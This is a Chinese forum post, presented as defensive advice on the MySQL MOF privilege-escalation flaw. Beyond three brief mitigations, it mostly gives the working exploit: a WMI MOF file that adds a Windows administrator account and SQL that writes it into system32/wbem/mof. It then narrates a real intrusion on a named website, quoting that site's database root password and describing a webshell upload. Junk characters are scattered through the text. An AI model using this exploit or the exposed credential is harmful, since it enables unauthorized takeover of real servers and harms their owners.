Mysql mof扩展漏洞防范方法
% P: k- u7 g5 v# W
7 j2 O9 h. ]2 [3 |6 \/ j网上公开的一些利用代码:) U" q4 `3 e( s) J% a0 m
8 r2 D7 H- S- l9 k; q#pragma namespace(“\\\\.\\root\\subscription”)3 D! [5 G1 U' c( W
y; t* |5 {) p( u) w: u
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
4 S& Q; V4 }* ^9 A8 ?9 g8 g& j
$ a. v6 k# Q( Q# e
8 e$ ^/ c. N3 O: r4 o
# }4 P7 ^ y! R) f7 O 4 h( t8 U, P" u. O9 [" V2 h
3 {, g m* o7 j
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;3 u% Y. R& I7 ?2 b w
从上面代码来看得出解决办法:& L; O, Q: R0 G9 `1 h5 I! H
7 v% n3 r5 C% o/ p/ J9 D" d$ O1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数& q! f- Y6 ^6 H7 A. G9 |* B$ l
- g) R4 [# F( q; |; @2 H
2、禁止使用”WScript.Shel”组件
2 b! w! G# m" N" x! T+ R, D- Z0 k" s l' D
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
! n" b o e6 V0 |; A# f4 a7 J: V% F$ _3 Y( Y
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下1 q2 x0 [" F0 t+ H1 N
0 X- ]! x# N# D& {; @事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
5 S- z# U* o, `6 p% c( v9 ?5 h p
8 U; z5 E; B) G7 \但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容& d+ t' m/ J5 g- U: q3 d! d% n
% a: f, A. q" o看懂了后就开始练手吧
: F2 K3 s, j$ R7 ~) h$ a0 A( j8 _
! `3 T# b6 q9 F# c6 ?8 ~http://www.webbmw.com/config/config_ucenter.php 一句话 a" v8 L' W; O" W$ A; Q3 z" `% P
% b! r# J+ G& w$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。- [) C+ R7 ?1 s
. p# D6 H% }) H8 X. }2 w/ t于是直接用菜刀开搞1 \4 }3 O! W# c3 J- F
* ]) ]9 L0 v0 J L4 U3 v
上马先' x9 s# F& C3 i- g1 {& b
) h" {4 W' o- o U3 k
既然有了那些账号 之类的 于是我们就执行吧…….; {7 o e. e4 {2 U. k
+ C! a# B0 n! S( k6 X2 M; }小小的说下
& B: V' X+ k3 A; P: ~( P
# D1 \; c$ y6 Y4 P在这里第1次执行未成功 原因未知
4 P. a) i9 a6 T: I2 M; H2 J6 l6 I, F& @
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。: [3 O2 g" Q3 }. w7 c! @
& s w# ~' q0 l
#pragma namespace(“\\\\.\\root\\subscription”)) a4 V" d8 [ v. O; a- C9 a& U
+ I) p0 S9 o: p! w( ]: Cinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
5 y. Z7 ]/ n/ V% G3 V9 y- p z# L
我是将文件放到C:\WINDOWS\temp\1.mof [' u# S2 {# f/ u3 `" V% E
; S: F2 Z. x6 K& s" M% o/ t4 ~
所以我们就改下执行的代码2 x) s. k$ z3 O; W1 o) n. M
6 U7 x' e- O; k2 Q, B/ r3 l2 |
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
G. u' S7 x" v/ g: Q2 k4 I% R1 a' q8 l; R# a
- b- A$ A0 }+ T4 y- b# f
. Z% `" N7 E1 g" g( G& H, X; j但是 你会发现账号还是没有躺在那里。。- a5 ?. V& ]0 t; E; C* U/ I0 ^
" T3 L+ t0 i. f4 y ?于是我就感觉蛋疼, R4 `4 u- i- T1 P. V' h$ O/ T% \& u7 v
7 e6 ^4 k2 X5 K. T0 m9 b就去一个一个去执行 但是执行到第2个 mysql时就成功了………5 d+ S7 S: `% u# l* z2 o
4 H$ o+ M4 c! Q: t2 f# C$ K6 o) ?; K' z2 C; X% @2 N
/ G5 T9 E( e* O, R9 u- @2 X但是其他库均不成功…
4 y7 |1 w0 \- D- I2 K0 p
& a: E i5 P1 r: n( Z我就很费解呀 到底为什么不成功求大牛解答…8 s; Z+ s6 c. v7 {) a2 E" T
2 T$ y5 w# W. Q- |
% V* X' W' `* e+ E3 b3 I' |3 V' ~$ m" z) F' Q
|
发表于 2013-1-4 19:49:49
收藏
支持
反对